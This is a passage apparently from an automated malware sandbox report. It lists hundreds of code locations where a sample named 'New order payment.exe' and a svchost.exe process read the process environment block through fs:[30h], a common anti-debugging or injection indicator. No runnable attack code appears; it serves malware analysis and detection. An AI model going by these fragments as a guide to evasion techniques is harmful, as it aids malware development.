          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]1_2_009B03E2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]1_2_009B03E2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]1_2_009B03E2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]1_2_009AA309
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4131B mov eax, dword ptr fs:[00000030h]1_2_00A4131B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098F358 mov eax, dword ptr fs:[00000030h]1_2_0098F358
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098DB40 mov eax, dword ptr fs:[00000030h]1_2_0098DB40
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B3B7A mov eax, dword ptr fs:[00000030h]1_2_009B3B7A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B3B7A mov eax, dword ptr fs:[00000030h]1_2_009B3B7A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098DB60 mov ecx, dword ptr fs:[00000030h]1_2_0098DB60
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58B58 mov eax, dword ptr fs:[00000030h]1_2_00A58B58
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099849B mov eax, dword ptr fs:[00000030h]1_2_0099849B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06CF0 mov eax, dword ptr fs:[00000030h]1_2_00A06CF0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06CF0 mov eax, dword ptr fs:[00000030h]1_2_00A06CF0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06CF0 mov eax, dword ptr fs:[00000030h]1_2_00A06CF0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A414FB mov eax, dword ptr fs:[00000030h]1_2_00A414FB
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58CD6 mov eax, dword ptr fs:[00000030h]1_2_00A58CD6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]1_2_00A41C06
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5740D mov eax, dword ptr fs:[00000030h]1_2_00A5740D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5740D mov eax, dword ptr fs:[00000030h]1_2_00A5740D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5740D mov eax, dword ptr fs:[00000030h]1_2_00A5740D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]1_2_00A06C0A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]1_2_00A06C0A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]1_2_00A06C0A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]1_2_00A06C0A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BBC2C mov eax, dword ptr fs:[00000030h]1_2_009BBC2C
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA44B mov eax, dword ptr fs:[00000030h]1_2_009BA44B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]1_2_009BAC7B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1C450 mov eax, dword ptr fs:[00000030h]1_2_00A1C450
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1C450 mov eax, dword ptr fs:[00000030h]1_2_00A1C450
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A746D mov eax, dword ptr fs:[00000030h]1_2_009A746D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BFD9B mov eax, dword ptr fs:[00000030h]1_2_009BFD9B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BFD9B mov eax, dword ptr fs:[00000030h]1_2_009BFD9B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A505AC mov eax, dword ptr fs:[00000030h]1_2_00A505AC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A505AC mov eax, dword ptr fs:[00000030h]1_2_00A505AC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]1_2_00982D8A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]1_2_00982D8A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]1_2_00982D8A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]1_2_00982D8A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]1_2_00982D8A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]1_2_009B2581
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]1_2_009B2581
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]1_2_009B2581
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]1_2_009B2581
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B1DB5 mov eax, dword ptr fs:[00000030h]1_2_009B1DB5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B1DB5 mov eax, dword ptr fs:[00000030h]1_2_009B1DB5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B1DB5 mov eax, dword ptr fs:[00000030h]1_2_009B1DB5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B35A1 mov eax, dword ptr fs:[00000030h]1_2_009B35A1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A4FDE2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A4FDE2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A4FDE2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]1_2_00A4FDE2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A38DF1 mov eax, dword ptr fs:[00000030h]1_2_00A38DF1
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]1_2_00A06DC9
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]1_2_00A06DC9
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]1_2_00A06DC9
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov ecx, dword ptr fs:[00000030h]1_2_00A06DC9
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]1_2_00A06DC9
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]1_2_00A06DC9
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099D5E0 mov eax, dword ptr fs:[00000030h]1_2_0099D5E0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099D5E0 mov eax, dword ptr fs:[00000030h]1_2_0099D5E0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58D34 mov eax, dword ptr fs:[00000030h]1_2_00A58D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A0A537 mov eax, dword ptr fs:[00000030h]1_2_00A0A537
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4E539 mov eax, dword ptr fs:[00000030h]1_2_00A4E539
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4D3B mov eax, dword ptr fs:[00000030h]1_2_009B4D3B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4D3B mov eax, dword ptr fs:[00000030h]1_2_009B4D3B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4D3B mov eax, dword ptr fs:[00000030h]1_2_009B4D3B
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098AD30 mov eax, dword ptr fs:[00000030h]1_2_0098AD30
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]1_2_00993D34
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A7D50 mov eax, dword ptr fs:[00000030h]1_2_009A7D50
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C3D43 mov eax, dword ptr fs:[00000030h]1_2_009C3D43
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A03540 mov eax, dword ptr fs:[00000030h]1_2_00A03540
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A33D40 mov eax, dword ptr fs:[00000030h]1_2_00A33D40
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AC577 mov eax, dword ptr fs:[00000030h]1_2_009AC577
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AC577 mov eax, dword ptr fs:[00000030h]1_2_009AC577
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A50EA5 mov eax, dword ptr fs:[00000030h]1_2_00A50EA5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A50EA5 mov eax, dword ptr fs:[00000030h]1_2_00A50EA5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A50EA5 mov eax, dword ptr fs:[00000030h]1_2_00A50EA5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A046A7 mov eax, dword ptr fs:[00000030h]1_2_00A046A7
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1FE87 mov eax, dword ptr fs:[00000030h]1_2_00A1FE87
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B36CC mov eax, dword ptr fs:[00000030h]1_2_009B36CC
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C8EC7 mov eax, dword ptr fs:[00000030h]1_2_009C8EC7
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3FEC0 mov eax, dword ptr fs:[00000030h]1_2_00A3FEC0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58ED6 mov eax, dword ptr fs:[00000030h]1_2_00A58ED6
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B16E0 mov ecx, dword ptr fs:[00000030h]1_2_009B16E0
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009976E2 mov eax, dword ptr fs:[00000030h]1_2_009976E2
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA61C mov eax, dword ptr fs:[00000030h]1_2_009BA61C
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA61C mov eax, dword ptr fs:[00000030h]1_2_009BA61C
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098C600 mov eax, dword ptr fs:[00000030h]1_2_0098C600
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098C600 mov eax, dword ptr fs:[00000030h]1_2_0098C600
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098C600 mov eax, dword ptr fs:[00000030h]1_2_0098C600
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B8E00 mov eax, dword ptr fs:[00000030h]1_2_009B8E00
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3FE3F mov eax, dword ptr fs:[00000030h]1_2_00A3FE3F
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41608 mov eax, dword ptr fs:[00000030h]1_2_00A41608
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098E620 mov eax, dword ptr fs:[00000030h]1_2_0098E620
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]1_2_00997E41
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]1_2_00997E41
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]1_2_00997E41
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]1_2_00997E41
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]1_2_00997E41
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00997E41 mov eax, dword ptr fs:[00000030h]1_2_00997E41
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AE44 mov eax, dword ptr fs:[00000030h]1_2_00A4AE44
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AE44 mov eax, dword ptr fs:[00000030h]1_2_00A4AE44
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]1_2_009AAE73
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]1_2_009AAE73
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]1_2_009AAE73
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]1_2_009AAE73
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AAE73 mov eax, dword ptr fs:[00000030h]1_2_009AAE73
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099766D mov eax, dword ptr fs:[00000030h]1_2_0099766D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00998794 mov eax, dword ptr fs:[00000030h]1_2_00998794
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07794 mov eax, dword ptr fs:[00000030h]1_2_00A07794
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07794 mov eax, dword ptr fs:[00000030h]1_2_00A07794
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07794 mov eax, dword ptr fs:[00000030h]1_2_00A07794
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C37F5 mov eax, dword ptr fs:[00000030h]1_2_009C37F5
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AF716 mov eax, dword ptr fs:[00000030h]1_2_009AF716
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA70E mov eax, dword ptr fs:[00000030h]1_2_009BA70E
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA70E mov eax, dword ptr fs:[00000030h]1_2_009BA70E
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB73D mov eax, dword ptr fs:[00000030h]1_2_009AB73D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB73D mov eax, dword ptr fs:[00000030h]1_2_009AB73D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5070D mov eax, dword ptr fs:[00000030h]1_2_00A5070D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5070D mov eax, dword ptr fs:[00000030h]1_2_00A5070D
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BE730 mov eax, dword ptr fs:[00000030h]1_2_009BE730
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1FF10 mov eax, dword ptr fs:[00000030h]1_2_00A1FF10
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1FF10 mov eax, dword ptr fs:[00000030h]1_2_00A1FF10
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00984F2E mov eax, dword ptr fs:[00000030h]1_2_00984F2E
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00984F2E mov eax, dword ptr fs:[00000030h]1_2_00984F2E
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58F6A mov eax, dword ptr fs:[00000030h]1_2_00A58F6A
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099EF40 mov eax, dword ptr fs:[00000030h]1_2_0099EF40
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099FF60 mov eax, dword ptr fs:[00000030h]1_2_0099FF60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038E138A mov eax, dword ptr fs:[00000030h]14_2_038E138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03831B8F mov eax, dword ptr fs:[00000030h]14_2_03831B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03831B8F mov eax, dword ptr fs:[00000030h]14_2_03831B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038DD380 mov ecx, dword ptr fs:[00000030h]14_2_038DD380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03852397 mov eax, dword ptr fs:[00000030h]14_2_03852397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0385B390 mov eax, dword ptr fs:[00000030h]14_2_0385B390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03854BAD mov eax, dword ptr fs:[00000030h]14_2_03854BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03854BAD mov eax, dword ptr fs:[00000030h]14_2_03854BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03854BAD mov eax, dword ptr fs:[00000030h]14_2_03854BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038F5BA5 mov eax, dword ptr fs:[00000030h]14_2_038F5BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A53CA mov eax, dword ptr fs:[00000030h]14_2_038A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038A53CA mov eax, dword ptr fs:[00000030h]14_2_038A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]14_2_038503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]14_2_038503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]14_2_038503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]14_2_038503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]14_2_038503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038503E2 mov eax, dword ptr fs:[00000030h]14_2_038503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384DBE9 mov eax, dword ptr fs:[00000030h]14_2_0384DBE9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038D23E3 mov ecx, dword ptr fs:[00000030h]14_2_038D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038D23E3 mov ecx, dword ptr fs:[00000030h]14_2_038D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_038D23E3 mov eax, dword ptr fs:[00000030h]14_2_038D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0384A309 mov eax, dword ptr fs:[00000030h]14_2_0384A309
